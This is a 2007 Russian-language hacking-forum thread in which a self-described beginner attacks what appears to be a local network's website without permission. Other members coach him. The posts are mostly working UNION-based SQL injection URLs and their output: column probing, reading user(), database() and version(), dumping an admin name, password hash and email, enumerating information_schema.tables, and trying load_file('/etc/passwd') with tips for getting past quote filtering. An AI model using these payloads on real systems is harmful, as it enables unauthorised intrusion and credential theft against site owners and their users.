Кто разбирается в SQL Injection
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Кто разбирается в SQL Injection - 2007-08-23 04:50:31.600000
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Всем привет. Подскажите пожалуйста толковый совет. Я долго-долго читал и учился хаку, но на практике ничего не применял. И вот я решил опробовать свои способности (думаю, настало время :)) Начать я решил с сайта местной локалки. Потыкав немного по ссылкам нашел пару XSS в скриптах поиска и скуль инъекцию: [link=http://target.com/video/index.php?act=film&id='][u][color=#0000ff]http://target.com/video/index.php?act=film&id=' Неверный MySQL запрос - select * from movie where id = '''You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 Опыта реализации XSS у меня нет, поэтому я взялся за уколы. Поля подобрал быстро - всего 6: http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,5,6%20/* отображаются почти все: 3 [IP: 6] [DATE: 2] 5 После этого узнал имя юзера, название и версию базы: http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,user(),6%20/* target@localhost http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,database(),6%20/* target http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,version(),6%20/* 5.0.26 Таблица пользователей и название поля с логинами дались относительно легко, вот только юзер в ней оказался всего один: Administrator (или это я чего то не догнал?) http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,name,6+from+target_users%20/* Administrator http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,password,6+from+target_users%20/* 823ab6438660a19ed16d431a51af1474 http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,id,6+from+target_users%20/* 62 http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,email,6+from+target_users%20/* [email=rim-rim@mail.ru]rim-rim@mail.ru[/email] Больше вытянуть из target_users мне ничего не удалось :( Прав доступа к mysql.user как я понял у меня нет. При запросах http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,5,6+from+mysql.user%20/* http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,user,6+from+mysql.user%20/* страница отображается в обычном режиме. При попытке использовать load_file(), страница то же отображается в обычном режиме http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,load_file(/etc/passwd),6%20/* Еще попробовал concat, так, ради интереса http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,concat(email,char(32),password,char(32),name),6+from+target_users%20/* rim-rim@mail.ru 823ab6438660a19ed16d431a51af1474 Administrator И вот на этом я уперся лбом в стену. Что дальше делать не знаю. Подскажите начинающему, что можно поиметь с такого расклада и если можно, то как это сделать? Только не предлагайте натравливать на сайт кучу сканеров и сплоитов. Потому что во первых - нет такой возможности (нет, в софте недостатка нет-][акер выписываю уже несколько лет, а там софта хватает, да и другие источники есть, просто дома инета нет, тренироватся хожу в клуб), а во вторых - хочется сделать это красиво, да и вообще - люблю все делать своими руками, не полагаясь на помощь сплойтов и т.д., они для меня сродни читам в играх. К тому же что это за хакер, который без сплоитов не может справится с системой. Во всяком случае я к этому стремлюсь. Заранее спасибо за помощь.
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 09:34:04.880000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
>вот только юзер в ней оказался всего один: Administrator (или это я чего то не догнал?) попробуй писать так: http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,concat(id,name,password),6+from+target_users+limit+X,1/* где X изначально равно 0, а потом постепенно увеличивай его на еденицу. >5.0.26 должна быть таблица information_schema.tables, из которой можно выбрать поле table_name (не забывай про limit, чтобы выбирать последовательно все записи) >При попытке использовать load_file(), страница то же отображается в обычном режиме 1)проверь, фильтруются ли кавычки. Просто напиши union select 1,2,3,4,'5',6/* 2.1)если кавычки не фильтруются, то можно попробовать написать load_file('/etc/passwd') 2.2)иначе придется строку '/etc/passwd' закодировать как-нибудь, например последовательностью char(…) или 0x… (для получения второго варианта в php есть функция bin2hex)
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 12:00:15.926666
|
|
|
muse
Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
|
http://www.target.ru/index.php?rn_id=-53+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables/* Выводит имена таблиц, но при подстановке любой таблицы в запрос, скуль выводит ошибку что такой таблицы не существует. В чем может быть загвоздка?
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 14:54:49.263333
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
quote:
ORIGINAL: Dimonelite >вот только юзер в ней оказался всего один: Administrator (или это я чего то не догнал?) попробуй писать так: http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,concat(id,name,password),6+from+target_users+limit+X,1/* где X изначально равно 0, а потом постепенно увеличивай его на еденицу. >5.0.26 должна быть таблица information_schema.tables, из которой можно выбрать поле table_name (не забывай про limit, чтобы выбирать последовательно все записи) >При попытке использовать load_file(), страница то же отображается в обычном режиме 1)проверь, фильтруются ли кавычки. Просто напиши union select 1,2,3,4,'5',6/* 2.1)если кавычки не фильтруются, то можно попробовать написать load_file('/etc/passwd') 2.2)иначе придется строку '/etc/passwd' закодировать как-нибудь, например последовательностью char(…) или 0x… (для получения второго варианта в php есть функция bin2hex) concat выводит тоже что и у меня кавычки фильтруются я сразу знал а вот information_schema.tables действительно есть и я из нее table_name'ом через limit нормально отстрелялся - Спасибо. Кто не понял http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables+limit+0,1%20/* http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables+limit+1,1%20/* http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables+limit+2,1%20/* и т.д. CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS и т.д. Вопрос на засыпку, что теперь с этим добром делать?
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 23:35:03.313333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
советую выбирать не просто table_name, а concat(table_schema,table_name). т.е. еще выбирать название БД, в которой находится та или иная таблица. вероятнее всего среди этих таблиц будет что-то типа admins или users с полезной атакующему информацией.
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-24 01:45:12.156666
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Ну ты даешь, я в первом случае пол дня сидел выбирал пока не догадался вместо X,1 поставить X,100 вот все CHARACTER_SETS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS KEY_COLUMN_USAGE ROUTINES SCHEMATA STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS article_text ban blog_categories blog_comments blog_link2cat blog_links blog_options blog_post2cat blog_postmeta blog_posts blog_usermeta blog_users download_film_rate fotogallery_albums fotogallery_banned fotogallery_bridge fotogallery_categories fotogallery_comments fotogallery_config fotogallery_dict fotogallery_ecards fotogallery_exif fotogallery_favpics fotogallery_filetypes fotogallery_hit_stats fotogallery_pictures fotogallery_plugins fotogallery_sessions fotogallery_temp_data fotogallery_usergroups fotogallery_users fotogallery_vote_stats fotogallery_votes lib_nucleus_actionlog lib_nucleus_activation lib_nucleus_ban lib_nucleus_blog lib_nucleus_category lib_nucleus_comment lib_nucleus_config lib_nucleus_item lib_nucleus_karma lib_nucleus_member lib_nucleus_plugin lib_nucleus_plugin_event lib_nucleus_plugin_option lib_nucleus_plugin_option_desc lib_nucleus_skin lib_nucleus_skin_desc lib_nucleus_team lib_nucleus_template lib_nucleus_template_desc lib_nucleus_tickets menu movie movie_old movie_old movie_prikol phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_sessions_keys phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words platejka site_admin site_admin_ip site_data site_news vote yubi_banner yubi_bannerclient yubi_bannerfinish yubi_categories yubi_components yubi_contact_details yubi_content yubi_content_frontpage yubi_content_rating yubi_core_acl_aro yubi_core_acl_aro_groups yubi_core_acl_aro_sections yubi_core_acl_groups_aro_map yubi_core_log_items yubi_core_log_searches yubi_groups yubi_mambots yubi_menu yubi_messages yubi_messages_cfg yubi_modules yubi_modules_menu yubi_newsfeeds yubi_poll_data yubi_poll_date yubi_poll_menu yubi_polls yubi_sections yubi_session yubi_stats_agents yubi_template_positions yubi_templates_menu yubi_users yubi_usertypes yubi_weblinks zakaz а тут ты пишешь concat(table_schema,table_name) и я из той же information_schema.tables начинаю вытягивать совершенно новые таблицы и их то же дохрена. Долго, нудно, но я не отступлю, я упорный, спасибо что помогаешь. Подскажи на каких стоит заострить внимание? это после concat(table_schema,table_name) yubi-netphpbb_vote_results yubi-netphpbb_vote_voters yubi-netphpbb_words yubi-netplatejka yubi-netsite_admin yubi-netsite_admin_ip yubi-netsite_data yubi-netsite_news yubi-netvote yubi-netyubi_banner yubi-netyubi_bannerclient yubi-netyubi_bannerfinish yubi-netyubi_categories yubi-netyubi_components yubi-netyubi_contact_details yubi-netyubi_content yubi-netyubi_content_frontpage yubi-netyubi_content_rating yubi-netyubi_core_acl_aro yubi-netyubi_core_acl_aro_groups yubi-netyubi_core_acl_aro_sections yubi-netyubi_core_acl_groups_aro_map yubi-netyubi_core_log_items yubi-netyubi_core_log_searches yubi-netyubi_groups yubi-netyubi_mambots yubi-netyubi_menu yubi-netyubi_messages yubi-netyubi_messages_cfg yubi-netyubi_modules yubi-netyubi_modules_menu yubi-netyubi_newsfeeds yubi-netyubi_poll_data yubi-netyubi_poll_date yubi-netyubi_poll_menu yubi-netyubi_polls yubi-netyubi_sections yubi-netyubi_session yubi-netyubi_stats_agents yubi-netyubi_template_positions yubi-netyubi_templates_menu yubi-netyubi_users yubi-netyubi_usertypes yubi-netyubi_weblinks yubi-netzakaz
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-25 04:03:49.440000
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
По ходу лоханулся я, начинающему простительно. Вчера синий был. Сегодня пришел, ужаснулся, и понял. Или понял и ужаснулся
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-27 00:54:13.216666
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Бублик, Форб, Роид… отпишитесь, разъясните начинающему, у вас же учился. Никитос, пни кого нибудь локтем, не убивайте во мне такое начинание…
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-29 09:27:06.140000
|
|
|
nutsbutters
Сообщений: 6
Оценки: 0
Присоединился: 2007-07-31 05:44:36.626666
|
quote:
concat(table_schema,table_name) concat(table_schema,':',table_name)
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-29 13:31:38.200000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: nutsbutters quote:
concat(table_schema,table_name) concat(table_schema,':',table_name) Ну ваще, прям блестнул знаниями. Если уж на то пошло, то concat_ws(':',table_schema,table_name,column_name)
|
|
|
RE: Кто разбирается в SQL Injection - 2007-09-03 21:55:38.753333
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Спасибо Dimonelite, ты открыл мне новые грани.
|
|
|
|
|